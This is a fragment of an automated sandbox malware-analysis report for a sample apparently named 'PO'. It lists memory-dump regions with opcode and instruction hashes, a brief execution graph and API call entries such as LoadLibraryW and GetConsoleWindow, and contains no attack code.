                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc828c17c14c5305a48ac734a62becba7877f10fa6e8efd70639736ac01ad84a
                        • Instruction ID: 04927a627f82866d698d48e778269d002a7a05bc06ec52fc46c545257fbc86da
                        • Opcode Fuzzy Hash: bc828c17c14c5305a48ac734a62becba7877f10fa6e8efd70639736ac01ad84a
                        • Instruction Fuzzy Hash: 70E0687254E2C49FCB018B90F5520ED3F34CB0B221B0402C7E89ECB612D2304A11C381
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68d89a7af26b4e0b8c5ce94d0a5be5298697ca9db6f4821d10648f253fcc98c7
                        • Instruction ID: 891f2cc88cfbdeea9fb88d8721c62386332825cf00fdd82013a5c06b8c7b97b8
                        • Opcode Fuzzy Hash: 68d89a7af26b4e0b8c5ce94d0a5be5298697ca9db6f4821d10648f253fcc98c7
                        • Instruction Fuzzy Hash: 86F082B49082958FCB06CFA8D9449DD7FB0FF05325F1482CADC649B3A2C7399541CB91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68692df63f3a7c23b623ca30d9032db3f219d93c4cdecbfd1f49d5124a9aca34
                        • Instruction ID: bded3936d0be4e96157908b318b771e06a3e9810e47f1adb08f40b53f4a17f78
                        • Opcode Fuzzy Hash: 68692df63f3a7c23b623ca30d9032db3f219d93c4cdecbfd1f49d5124a9aca34
                        • Instruction Fuzzy Hash: 39F02732904745CFC7229FB8E414044BBB2EF45302705C66FE08A9B190EF34A898CB90
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b89193e0039d186896a0d0810570f0b8c4aca649e0b29134a6973514049645fa
                        • Instruction ID: c407f0f416a11c22bd8b411b924c0adb07c4aaae82e7f99f3e959c76f503b556
                        • Opcode Fuzzy Hash: b89193e0039d186896a0d0810570f0b8c4aca649e0b29134a6973514049645fa
                        • Instruction Fuzzy Hash: 4EF0C9B4D152089FCB48DFA9D9456ADBBF5FB49304F0085AAD828A3310EB745A11CF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc201258b3d403d62cf5fe7ea9bbe301014a3a3c12109c53a3d2531bace67cc7
                        • Instruction ID: 46da9e9fee63d7a8db52553e4e1b76094f38ff61ba77154fdc77a1a1acba01d9
                        • Opcode Fuzzy Hash: fc201258b3d403d62cf5fe7ea9bbe301014a3a3c12109c53a3d2531bace67cc7
                        • Instruction Fuzzy Hash: 8CF0A0B0C08289DFCB15CFA8C8443ADBFB1FF01314F1086A9D86456392C73A9152DB81
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 900902b75366ce419d40ec12520dce6eaf06660b77f2da436c15882dba106651
                        • Instruction ID: 2ace72ac97c1c3e3385c9dbd2d65ed0d3e48e6526313069ffb13630db667f377
                        • Opcode Fuzzy Hash: 900902b75366ce419d40ec12520dce6eaf06660b77f2da436c15882dba106651
                        • Instruction Fuzzy Hash: 30F0A5B4629118CFE714CB60D2889AC77BEFB4E215F545699D02966355C731AC50CB11
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a26a08c15181c0027dc719206ff30c5d5a96bc94621d30785c790f9fd3c2c05
                        • Instruction ID: b2ecc4bb09e1be4fab465e94c8e10800696ce67b40ffc25776a1ef7648c93af1
                        • Opcode Fuzzy Hash: 2a26a08c15181c0027dc719206ff30c5d5a96bc94621d30785c790f9fd3c2c05
                        • Instruction Fuzzy Hash: 7EE0E5B0D01209EFCB44EFB8C9416AEBBF5FB08300F5086AAD818A3340E7759651DF81
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20d1e8b0cfe786d1dc74a2a58b080c706e98a22ea55d2f5dba37b1c55918bd0b
                        • Instruction ID: 410a8d49e199a7cfa36a4a98ea6f5925034900fa0f3dd6ee19e5b3e4646995e3
                        • Opcode Fuzzy Hash: 20d1e8b0cfe786d1dc74a2a58b080c706e98a22ea55d2f5dba37b1c55918bd0b
                        • Instruction Fuzzy Hash: 2AE0E57180520CEFCF069FA4D9069DD7F7AFB09301F108198F90422260C7329AB0EF95
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e650197e5c95b5a2aef74bc978da249f971a10b87fddd353a3a66c0fbc551b64
                        • Instruction ID: 677d71332ff80042d769f1844bce4b0107b10b4603632de8e7e85cd5a45a9130
                        • Opcode Fuzzy Hash: e650197e5c95b5a2aef74bc978da249f971a10b87fddd353a3a66c0fbc551b64
                        • Instruction Fuzzy Hash: 77E0EDB4D00218DFCB44DFA8D9456ADBBF4FB08304F1085A9D818E7351D7709950CF91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7b3f26bd801959ea2ab0dd3e2fef407bea0e484273787c807dd4879d2682d6e
                        • Instruction ID: 6541b6bdb59fd39ac25ec0a4d21b82a268b23af3c232382912382488d0d1f28b
                        • Opcode Fuzzy Hash: c7b3f26bd801959ea2ab0dd3e2fef407bea0e484273787c807dd4879d2682d6e
                        • Instruction Fuzzy Hash: 57E022714092849FCF88CF28D48A4AC3F7CFE02201B6811E8E89B8F266C726D542DB01
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50676afa0d2a7d73fcd9a99579c8af3c3f1c8dc21e6a2b8c2925ca354e290208
                        • Instruction ID: 7346ceb6e5aefa6d699561addf6e9ecefcdfd8e09b1b35f3cd473514872fb256
                        • Opcode Fuzzy Hash: 50676afa0d2a7d73fcd9a99579c8af3c3f1c8dc21e6a2b8c2925ca354e290208
                        • Instruction Fuzzy Hash: E0D05E323501249FC300ABB9F908EA377ECEB48665B0540A6F20DCB221DAA2EC008780
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4b71807f49fab010a56b26a7745eb64858484927887b6d67cc9edf58a969b34
                        • Instruction ID: bee648fb4e8243ecbce96297600ff78a787988437fdd252924c2ab7ef3577ae9
                        • Opcode Fuzzy Hash: d4b71807f49fab010a56b26a7745eb64858484927887b6d67cc9edf58a969b34
                        • Instruction Fuzzy Hash: 06E026B0D5428A9FCB09CFE8C5803CCBFB0EB01314F2047D9A87857291C73A5512DB40
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9262bcff1833f982a3c967286af64ed3bb2035a8fbc686ae7f5d86479101997e
                        • Instruction ID: c965c5dcdd0ef6edd8902b431f807b7e2f51ed5ddf125b8320d71ca787bd433b
                        • Opcode Fuzzy Hash: 9262bcff1833f982a3c967286af64ed3bb2035a8fbc686ae7f5d86479101997e
                        • Instruction Fuzzy Hash: 99E092B4E21208AFCB84DFA9D449A9CBBF5EB08611F1081EAE858D7361E6359A54CF41
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b6ade89247c9ac8ea9813e889bcdb5c5a8de2f6ac6960b3a52523f30039112c
                        • Instruction ID: 9c157891187a62927958405b4bd2018cddd176667115fae9aa5653003a0e242a
                        • Opcode Fuzzy Hash: 4b6ade89247c9ac8ea9813e889bcdb5c5a8de2f6ac6960b3a52523f30039112c
                        • Instruction Fuzzy Hash: 72E02BB199D187CEC326C6A8CA467983FD1CB02225F1807DD8DA95F1F3CA6E551BD283
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62ea1cd7bdcd746b0a5cd6c41f8e85780cee444ae3e6e2629789e94083370cd3
                        • Instruction ID: 2032739448ff8fd6a30c424778e9e1e6368e0539ad84f076c4a37cea28474cfe
                        • Opcode Fuzzy Hash: 62ea1cd7bdcd746b0a5cd6c41f8e85780cee444ae3e6e2629789e94083370cd3
                        • Instruction Fuzzy Hash: 0FE0ECB4D11208AFCB84DFB9D44529CBFF4EB04204F0081A9A818A3350E7345A54CF41
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0350851500596d50f60d5c9233529ac400ffb5a78e95dfc5ec3bf86b191363f5
                        • Instruction ID: 9440cda71a3584062989c29ac6c8968765f2f954d0158f99164bd861b4fd54b5
                        • Opcode Fuzzy Hash: 0350851500596d50f60d5c9233529ac400ffb5a78e95dfc5ec3bf86b191363f5
                        • Instruction Fuzzy Hash: 4BE092B490522DCFEB14DF65C849BDCB7B9BF49211F0145E6E40AAA250D7345A85CF10
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 864e999ad8784d13d4ebca3a1895f04d1fc474ad94984e394131186305e0f935
                        • Instruction ID: bb3eec3f9bcb2f0081495818eedc482423bd83adaa57ee6f68ae57ca6f1ba35d
                        • Opcode Fuzzy Hash: 864e999ad8784d13d4ebca3a1895f04d1fc474ad94984e394131186305e0f935
                        • Instruction Fuzzy Hash: A4D0A77081510CDFC744EBB8D90529D7BF59B00205F1001B8C90853261EA305E14C781
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbb147c29dfa8994be1fa7829f042537e5a1523ba4f89792d52fdfaa104115f8
                        • Instruction ID: 05d5ca5c94622e72cd9949e57067bc2db6f3ca82b603d76213017f96785d4af3
                        • Opcode Fuzzy Hash: dbb147c29dfa8994be1fa7829f042537e5a1523ba4f89792d52fdfaa104115f8
                        • Instruction Fuzzy Hash: 93C08C700166048BC30D3BA5E60E3A4BFAC6B02212F400110F04D010618EB340A4CB66
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6901ff4a46e73b157a774a931034ca47af93b47a3de384e946af964b97548f69
                        • Instruction ID: 4d687942c0a198647c4146eab3788b6efeaa8adcbc5a00a560e73cc2ad4ab823
                        • Opcode Fuzzy Hash: 6901ff4a46e73b157a774a931034ca47af93b47a3de384e946af964b97548f69
                        • Instruction Fuzzy Hash: 9DB01233C4428C599B2C0A95350D0D8FF6A46C7115309518FE09D070669D3000E4CF56
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45c45abe65887f1a4f2968dfe1c2694d6aafc723e673d7040553644464e1f6b5
                        • Instruction ID: cf084de2e86e3fe7c081f68ec7cf9c4ac8787f46bb0d977d4fd96f7945b3e9a6
                        • Opcode Fuzzy Hash: 45c45abe65887f1a4f2968dfe1c2694d6aafc723e673d7040553644464e1f6b5
                        • Instruction Fuzzy Hash: FEA002B4C3C249DFD7154F55E00D3AC7FB5A75535DF008155A82351651CF791188DF01

                        Execution Graph

                        Execution Coverage:12.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:30
                        Total number of Limit Nodes:1
                        execution_graph 28514 6976361 28515 69762fc 28514->28515 28516 697636a 28514->28516 28517 697631d 28515->28517 28520 69773f1 28515->28520 28524 6977400 28515->28524 28521 697738d 28520->28521 28521->28520 28522 6977451 28521->28522 28528 6976f98 28521->28528 28522->28517 28525 6977448 28524->28525 28526 6977451 28525->28526 28527 6976f98 LoadLibraryW 28525->28527 28526->28517 28527->28526 28529 69775f0 LoadLibraryW 28528->28529 28531 6977665 28529->28531 28531->28522 28492 2fb0871 28496 2fb08d8 28492->28496 28501 2fb08c8 28492->28501 28493 2fb0889 28497 2fb08fa 28496->28497 28506 2fb0ce8 28497->28506 28510 2fb0ce0 28497->28510 28498 2fb093e 28498->28493 28502 2fb08d8 28501->28502 28504 2fb0ce8 GetConsoleWindow 28502->28504 28505 2fb0ce0 GetConsoleWindow 28502->28505 28503 2fb093e 28503->28493 28504->28503 28505->28503 28507 2fb0d26 GetConsoleWindow 28506->28507 28509 2fb0d56 28507->28509 28509->28498 28511 2fb0ce8 GetConsoleWindow 28510->28511 28513 2fb0d56 28511->28513 28513->28498
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069774A6), ref: 06977656
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291634772.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6970000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 756ebd33c06e63ce398eb2269e2fb6b4ae9de21f4edcffc68f30091ecc125789
                        • Instruction ID: 535bdafa7d80d879d98af18204c35efb25738a0401b9400e9f3555f9c13c2d2f
                        • Opcode Fuzzy Hash: 756ebd33c06e63ce398eb2269e2fb6b4ae9de21f4edcffc68f30091ecc125789
                        • Instruction Fuzzy Hash: 811112B5C006498FCB10DF9AD444ADEFBF9AB88320F20842AD419AB710D379A546CFA1
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069774A6), ref: 06977656
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291634772.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6970000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: b94770e1514615e29ddaefe596c54a5e9a254217bd8cf081e266e255bce27266
                        • Instruction ID: dc8802d34826fbe080ac3ed78bc2ab98d123a8e13dca754836b077fbaa6cd16f
                        • Opcode Fuzzy Hash: b94770e1514615e29ddaefe596c54a5e9a254217bd8cf081e266e255bce27266
                        • Instruction Fuzzy Hash: 251123B1D007498FCB10DF9AD444A9EFBF9EF88210F14842AD419BB710D379A545CFA5
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02FB0D47
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2276104581.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_2fb0000_PO.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 2a75632f874e4d920000aeb7e4107725bda5250dc4ed90c891233c6e278da975
                        • Instruction ID: 22d773a9ef2e738c59817665933f8eb66cc12ed2aad500ae01f09d1fb7ddeb56
                        • Opcode Fuzzy Hash: 2a75632f874e4d920000aeb7e4107725bda5250dc4ed90c891233c6e278da975
                        • Instruction Fuzzy Hash: 9C1125B5D002098FCB20DFAAC8497DFFBF5EF48324F208419C51AA7240CB79A544CBA5
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02FB0D47
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2276104581.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_2fb0000_PO.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 55a2f9bb77a6b1c563e2914ad1995ba1ccb46417ba01a648202d3cc6e77ae432
                        • Instruction ID: eaf7b4cd4e101af1add42d988c169eebd7ef91c57ab1e983fe349d4d012902c6
                        • Opcode Fuzzy Hash: 55a2f9bb77a6b1c563e2914ad1995ba1ccb46417ba01a648202d3cc6e77ae432
                        • Instruction Fuzzy Hash: 6B1103B5D002498FCB20DFAAD5457EFFBF5EF48324F20841AC51AA7250CB79A544CBA1
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f04fe862490978b8c43a534f149e9594ce8dfa081832b71e629c997717e429e6
                        • Instruction ID: 1cd2482f4ab4c9fb720f5e1ad131dd4fce418411355746e8baee8641fb1d1abb
                        • Opcode Fuzzy Hash: f04fe862490978b8c43a534f149e9594ce8dfa081832b71e629c997717e429e6
                        • Instruction Fuzzy Hash: B8C27F34B002189FCB54DF58C990EADBBB6FF88704F108499E606AB365CB71AE41DF65
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 32f03ada69071d72250c94a87799903c4d8db6596f2f408990bfa967ac4f8d9c
                        • Instruction ID: 8965420edb3046a34b31d140d1ead575a2cb3894537cf3e6cf44f365c7fb8e97
                        • Opcode Fuzzy Hash: 32f03ada69071d72250c94a87799903c4d8db6596f2f408990bfa967ac4f8d9c
                        • Instruction Fuzzy Hash: 72A1BE74B002049FDB44DB78C954E6EBBF6EF89314B1084AAE506DB7A1DB35DC01CB62
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a23a861a8a8be2bf5ce44e8fcb5d36352717b8ba8e8d4cb59a4daa77ecece08
                        • Instruction ID: adea66305573641c41ea45f1a07ae54bfd7d814a1ab7492dd316b3584e81451b
                        • Opcode Fuzzy Hash: 0a23a861a8a8be2bf5ce44e8fcb5d36352717b8ba8e8d4cb59a4daa77ecece08
                        • Instruction Fuzzy Hash: 6E4286306406258FCB25EF68D450A6EBAB6FFC5314F014A5CC5039B794CB7AED098B9A
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96baee4e415b8db65a6b1b21c38aa797bec99810c0b44ad3e7f65ec450c84a69
                        • Instruction ID: cba3abad2a6f72fe07599219fbf81994ba20b3e8969d2d310e816d435c6758a7
                        • Opcode Fuzzy Hash: 96baee4e415b8db65a6b1b21c38aa797bec99810c0b44ad3e7f65ec450c84a69
                        • Instruction Fuzzy Hash: 0F12DB30740615CFCB14DF68C850A6EBBB6FF85714F008A4CD5029B7A5CBBAED098B96
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b66eb61b7e7cefa443c1e815c8f836c01dfdc2eedb6d0b5b6c204fc5e8cd4b76
                        • Instruction ID: a17fe4899e4f73c20d11b28aed16649964ba4f625766a6cadb64374ee8b7df6a
                        • Opcode Fuzzy Hash: b66eb61b7e7cefa443c1e815c8f836c01dfdc2eedb6d0b5b6c204fc5e8cd4b76
                        • Instruction Fuzzy Hash: BF12B730B40615CFCB14DF68C850A6EBBB6FF85714F00894CD5029B7A5CBBAED098B96
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc6f26a5ae3193497506b3aaae06845bd320c36d674fa46c4e47f2a9d82cb351
                        • Instruction ID: 262db0af0499cd99ed613fed3a366f107c76618d265712ab115d98d30b48898d
                        • Opcode Fuzzy Hash: fc6f26a5ae3193497506b3aaae06845bd320c36d674fa46c4e47f2a9d82cb351
                        • Instruction Fuzzy Hash: AF029670A40604CFDB14DF68C850A6EBBB6FF85714F00895CD5029B7A5CBBAED098B96
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0d0e92e07746a007abbb9065d996b822ce74561a0a909d57184f95058f17c0c4
                        • Instruction ID: 1a653ddf5cd22e0a8cf12498e6f1c2c90c0730fa584857ec63534f8d278f0a55
                        • Opcode Fuzzy Hash: 0d0e92e07746a007abbb9065d996b822ce74561a0a909d57184f95058f17c0c4
                        • Instruction Fuzzy Hash: 29F1A870A00604DFDB04DF68C851A6EBBB6FF84714F108949D5028B7A5CBBAAD05CB96
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b11e2e766446e66435e56ba0f2131c741fe379ff213feb0fb02115ed531c2ef
                        • Instruction ID: b49a8597f111846428fbff80abe7b56d3448fd118cca74a3eb629bc574ef427a
                        • Opcode Fuzzy Hash: 5b11e2e766446e66435e56ba0f2131c741fe379ff213feb0fb02115ed531c2ef
                        • Instruction Fuzzy Hash: BAE1DE70B00604DFDB00CF68C951A6E7BBAFF84714F108559E5028B7A5CBBADD45CBA6
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d095b39d3bd2a6f28407c445ea8e5d97dacb1bb54b6130f3848dd6c2d96532ea
                        • Instruction ID: bb795e0c31d519cbfea666e16ffb25e6f7bdb563f520a54271f9698e62f8b187
                        • Opcode Fuzzy Hash: d095b39d3bd2a6f28407c445ea8e5d97dacb1bb54b6130f3848dd6c2d96532ea
                        • Instruction Fuzzy Hash: AFD1F370B00204DFDB41CF64C851A6A7BBAFF89714F11859AE5018F7A6CBB6DD05CBA2
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3658713b4ccf505b74ca675573c37a214c41a79f8f053ee9042c6bbfe32c41a3
                        • Instruction ID: b49407275a83d9bb6047f48a65a2c30a121be87cc013bdc0b97bdddbdbf418d5
                        • Opcode Fuzzy Hash: 3658713b4ccf505b74ca675573c37a214c41a79f8f053ee9042c6bbfe32c41a3
                        • Instruction Fuzzy Hash: 49917D35B102049FCB44DF69C894EAABBF6EF89710B15C0A9E905AB761DB31EC05CB51
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84004aaa75bdc036130d0556dd712248d6d88917ef10b664814c3275efaa022b
                        • Instruction ID: 5e45979f26ed4a914f1e1d21d0ab1e091ee2d76b5886fb379ad62f57276ec7e3
                        • Opcode Fuzzy Hash: 84004aaa75bdc036130d0556dd712248d6d88917ef10b664814c3275efaa022b
                        • Instruction Fuzzy Hash: F6512931700305CFCB54AF7D988046ABBEAEFC1224B24857FD9458BA12EB31C845C7A6
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274881355.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_132d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99be257908636465d4d3ff4a00088436d692a0f4b5321c24f9d9cefca5fa2886
                        • Instruction ID: 67cc70dd54c01bc44d03a0d5536ea993801ad4f6aa0e62298548bfe600577f06
